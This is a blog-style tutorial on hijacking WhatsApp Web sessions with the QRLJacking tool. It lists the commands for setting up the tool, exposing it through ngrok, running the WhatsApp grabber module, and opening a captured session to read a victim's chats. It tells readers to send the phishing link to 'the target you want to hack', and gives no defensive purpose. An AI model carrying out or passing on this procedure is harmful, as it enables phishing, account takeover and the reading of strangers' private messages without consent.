Long before the time when cell phone networks were as fast as they are today, back in the days when we were still using cell phones with buttons, we exchanged text and voice messages using SMS and Voice Calls over GSM networks. But who would have thought, the internet evolved to provide information exchange services that are relatively cheaper and cost-effective. What's more, you can send pictures, videos and so on. SMS and Voice Calls are starting to be rarely used and people are turning to instant messaging applications which can also be called Chat applications.
Chat applications are widely used by the public in 2021, for example, such as Telegram, Whatsapp, Messenger from Facebook, Signal and so on. Whatsapp is the most popular application of all the applications that I mentioned earlier, not only that Whatsapp also has a Whatsapp Web feature for users to use on computers. Whatsapp web uses the QR Code feature to authenticate users to a computer. But who would have thought, this Whatsapp QR code can be used by Hackers to tap your Whatsapp access.
It turns out that the request for a QR code from a computer generated by the Whatsapp Web site can be faked by requesting the same QR code from another computer. QR code counterfeiting is a social engineering technique and can also be called a phishing attack. This time, I will use the QRLJacking tool that we can get on github. As usual, to host this fake QR code we need a port forwarder which this time I will use ngrok.
Fine, just as usual, a PC/Laptop with Linux OS.
Next, the QRLJacker application that you can get on github.
To clone the application to Linux, type the command below in the terminal.
git clone https://github.com/OWASP/QRLJacking.git
Go to QRLJacker directory, type below command.
cd QRLJacking/QRLJacker
Install the QRLJacker requirements with the command:
pip3 install -r requirements.txt
Next is to install the latest geckodriver . You can visit the site to download.
On my computer, because I'm using 64 bit Linux then I downloaded the 64 bit Linux version of geckodriver. Next is to extract the geckodriver earlier.
tar xzvf geckodriver-v0.29.0-linux64.tar.gz
Give permission to geckodriver.
chmod +x geckodriver
Next move the geckodriver to the Linux binary directory.
sudo mv -f geckodriver /usr/local/share/geckodriver
Next is to create a geckodriver link.
sudo ln -s /usr/local/share/geckodriver /usr/local/share/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
Good configuration is ready, next is to run port forward to the internet. Like most tutorials, here we will use ngrok. We will enable ngrok port forward to port 8080.
ngrok http 8080
Next run QrlJacker with python3.
After the application is successfully run, it will look like the display below.
After successfully entering the QrlJacker Panel, then we just have to run it. Use grabber module with below command.
use grabber/whatsapp
Configure the Port and IP with the following settings.
set port 8080
set host 0.0.0.0
The last step we just run it with the run command.
run
Open your ngrok panel again, then copy the link in the forwarding line and send it to the target you want to hack. In this case I will use my windows computer as the victim's computer.
When the victim opens the Fake QR link address it will look like the image below.
And when the victim scans the fake QR code, the display of our QR code terminal will look like the one below.
To see the active session we can type the command below.
sessions
Then the last step to view the contents of our victim's Whatsapp Chat, just type the command below.
sessions -i 0
Then we will be faced with the contents of the WhatsApp Web conversation belonging to the target we trapped earlier.
If there are problems in conducting experiments, try updating your mozilla to the latest version. Because the minimum version of mozilla in doing this is version 69. Or try installing a new mozilla on your Linux. Well that's all I can say, more and less sorry and thank you. Please comment if there are any shortcomings.